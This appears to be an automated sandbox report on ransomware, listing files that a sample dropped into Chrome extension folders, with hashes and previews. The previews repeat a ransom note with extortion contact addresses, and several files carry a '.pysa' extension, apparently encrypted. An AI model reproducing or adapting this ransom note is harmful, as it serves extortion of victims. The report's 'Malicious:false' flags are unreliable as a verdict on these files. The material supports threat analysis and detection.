                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\nl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\no\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\pl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\pt_BR\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\pt_PT\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ro\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ru\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\zh_CN\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\zh_TW\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.163424926371964
                  Encrypted:false
                  SSDEEP:96:xNFW0bbiTMBp60ZFS+eCQc2HHzoNaVhl34yeFaa8+h4gAX3n:zHfiY/xVeCQc6H2aVhlIAHR
                  MD5:B427CE4385288CDC9934CA1628E470E6
                  SHA1:46925C856186974D12A4FE4E0D4688EEEA8F6389
                  SHA-256:973888D79DECD82A6CF14959CBDCFE2D6D1DC5360A3C329C7E953A1BD8121C4F
                  SHA-512:A7742C727ADCF58FF704E06CF016FFF8E6AA39FC8A2EF600B9DB4A60BF47466C056D633DCA72433863D1EAFD25E7C6DC1D60AF6FCEC31162B30853220BA56337
                  Malicious:false
                  Preview: .].5.l......Q..T........w.....R^...#.L[..........u..+.P...........(.Q.....[.....G.FT...z8.cM..B.W....l._..`.;...U.......Z5...Vn.r.=.+.4PD.........x.2CK..+....6.=F..Wu.Z.O@...}....F0.E..J!.O...101......]..*$.l.c.K...G..jS.t.@...W..I..$S.v.7....#..;..........1".z.kHJ(XL.i..T.....l.f....2..kX.V)..*..p^.'..4.:......&.....;(+s/L5D..S.S-c.U*.a..../+....vp(tYc=-..p....|..u..8:.*9oM..s..[-.N{...^......dh.p..k.c5&....Y~C.o.L. ...%..}...E..b..m....-.JoO..6W@(.K6|.^".Zh..y.t.B.(.g...I...:.....D.d.....H..'>..$6......('.7x2........\"3k....y.b.^J..(..W......H0k.H..kU....X3.....m./........o.+0Y.5..'.).j90o'T.......^t@...2.....c..zy{S#..N...+..,x]..R.!>.h.=]...pKf.I..........bB.l.W.a..2....q.]..a.}.N.<....h.X....k.....y_....O.....@|f9...|...&e...].G.p.9.(.x6}q?m..~.x...}3...^....d%.% Q.:k...#d.Ph..(...S]...LM....j..\..K..Lv....@.. ..Q..<.......oi....k.ts...<.1...r....!....%..s..EK.".(0p.j.<.MWo.jl....+.9.A...k.\...f`g2.....f....ast.b.......Q.. .
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):7.3714453864737814
                  Encrypted:false
                  SSDEEP:96:PWzAeHcrB8TD81ZvgFl3n8YEQKv34tPvmxu00NIG86GiiGySSK:PTUcNkcAl3nS/M3mguXbDK
                  MD5:2EE9A6FBEFDEBDB5F2A7541C30EB5BCC
                  SHA1:9E6C2823C7609F5D338380704A8829B55E7D4E2D
                  SHA-256:167867951A623B6EDF0A5F5C385CECA60ED847715C74AD24A902E93E1C438448
                  SHA-512:3F7CDA0E0E7960B8908815EAD01BCD83FE917D9929A55F90A4C423AA98C8BBA7404067C8D874D4BFCB0F64BBCE2763D50478048DF7854C0D7F9B952C24856086
                  Malicious:false
